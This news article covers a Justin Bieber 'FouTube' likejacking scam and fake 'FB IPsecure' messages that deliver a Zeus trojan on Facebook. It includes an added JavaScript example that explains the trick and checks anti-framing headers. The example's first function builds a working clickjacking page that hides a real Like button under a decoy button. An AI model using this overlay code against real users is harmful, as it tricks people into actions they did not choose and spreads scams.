Facebook Hit With Likejacking, Zeus Malware Attack


In the latest scam, detected by researchers at Sophos, users receive a message, apparently from one of their friends, that reads "I can't believe a GIRL did this because of Justin Bieber", together with a link to a YouTube knock-off site called "FouTube."

Clicking the Facebook "Like" button on that page leads to a likejacking scam, resembling many of the attacks that circulated on Facebook earlier this year, according to Chester Wisniewski, a Sophos senior security advisor. Instead of spreading malware, the attack displays a survey and tricks users into subscribing to a premium-rate SMS service billed to their mobile phones. The page also displays an offer to buy Facebook Groups and Fan pages, presumably to help propagate the scam.

Experts say this attack differs from others in that it spreads by exploiting users who "Like" the video: the "Like" is posted to the victim's Wall, which is how the message reaches their friends.
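To make the mechanism concrete, the following is an added example (written for this page, not code from Sophos or from the scam itself) showing the two halves of likejacking: how an attacker stacks a transparent iframe holding a real "Like" button over a decoy "Play" button, and how a site operator can check whether a response's headers stop its own pages from being framed that way. The decoy label, the plugin URL and the pixel offsets are placeholders; the header check follows the browser precedence rule that a CSP `frame-ancestors` directive, when present, overrides `X-Frame-Options`.

```javascript
'use strict';

// --- Attacker side: the overlay trick ---------------------------------------
// A likejacking page shows a visible decoy (e.g. a "Play video" button) and
// places an invisible iframe containing a genuine Like button exactly on top
// of it. The victim's click lands on "Like", and the page is reposted to
// their Wall. All parameters here are placeholders (constructed for this
// example), not values from the scam described in the article.
function buildLikejackPage({ decoyLabel, likeButtonUrl, x, y }) {
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;left:${x}px;top:${y}px">${decoyLabel}</button>`,
    // opacity:0 hides the frame while leaving it clickable; a higher z-index
    // makes sure the click goes to the iframe and never reaches the decoy.
    `<iframe src="${likeButtonUrl}" scrolling="no" frameborder="0"`,
    ` style="position:absolute;left:${x}px;top:${y}px;opacity:0;z-index:10"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// --- Defender side: can this response be framed by a third party? ----------
// Returns 'blocked', 'same-origin', 'restricted' or 'open'.
//   - If a CSP frame-ancestors directive is present it wins.
//   - Otherwise X-Frame-Options decides.
//   - With neither header, any site can frame the page (the likejacking case).
function framingPolicy(headers) {
  const get = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key ? String(headers[key]).trim() : null;
  };

  const csp = get('content-security-policy');
  if (csp) {
    const directive = csp
      .split(';')
      .map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      // Source expressions after the directive name, quotes stripped.
      const sources = directive
        .split(/\s+/)
        .slice(1)
        .map((s) => s.toLowerCase().replace(/^'|'$/g, ''));
      if (sources.length === 0 || sources.includes('none')) return 'blocked';
      if (sources.includes('*')) return 'open';
      if (sources.length === 1 && sources[0] === 'self') return 'same-origin';
      return 'restricted'; // an explicit allow-list of origins
    }
  }

  const xfo = get('x-frame-options');
  if (xfo) {
    const value = xfo.toUpperCase();
    if (value === 'DENY') return 'blocked';
    if (value === 'SAMEORIGIN') return 'same-origin';
    // ALLOW-FROM is obsolete and ignored by current browsers, so any other
    // value gives no protection.
    return 'open';
  }
  return 'open';
}

// Constructed sample responses, as a site operator's self-check might see them.
const samples = {
  noHeaders: {},
  deny: { 'X-Frame-Options': 'DENY' },
  cspNone: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  cspPartner: { 'Content-Security-Policy': "frame-ancestors 'self' https://partner.example" },
};
for (const [name, headers] of Object.entries(samples)) {
  console.log(`${name}: ${framingPolicy(headers)}`);
}
```

The page that a likejacker embeds is the Like button plugin itself, which is designed to be framed, so the defence above is for a site's own pages rather than for the social button; the user-level remedy in this case is the one Sophos gives below. The header check is the reliable control: legacy JavaScript "frame-busting" scripts can be disabled by a hostile parent frame (for example with the `sandbox` attribute), so a site should not rely on them alone.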

"Most Facebook attacks I have looked at recently were rogue Facebook applications rather than simply liking a Web page," Sophos' Wisniewski said in a blog post Tuesday. "This one is quite poorly crafted, yet it is still spreading quite quickly amongst Facebook users who can't seem to get enough Justin Bieber."


Users who have accidentally "Liked" the Justin Bieber Web page should visit their Facebook Wall and remove the "Like," Wisniewski recommended.

Meanwhile, Merianne Polintan, a Trend Micro anti-spam research engineer, warned that another malware attack is circulating on the site, consisting of spam messages that appear to come from Facebook. The fake messages, written in grammatically incorrect English, falsely warn users that their IP addresses are sending numerous spam messages to various e-mail addresses.

The message then urges users to download a supposedly free tool called FB IPsecure, which claims to come from Facebook, in order to stop the spam being sent from their machine.

In reality, the download is a variant of the Zeus trojan, which gives the attacker control of the user's computer once installed.

The attack isn't much different from Zeus-related malware attacks previously circulating on Facebook, experts say.

Still, Trend Micro researchers warn that users should be cautious when opening unfamiliar or suspicious-looking links on Facebook.

"In particular, messages that supposedly come from reputable sites like Facebook but contain plenty of grammatical and spelling mistakes should be treated as very suspicious," Polintan warns.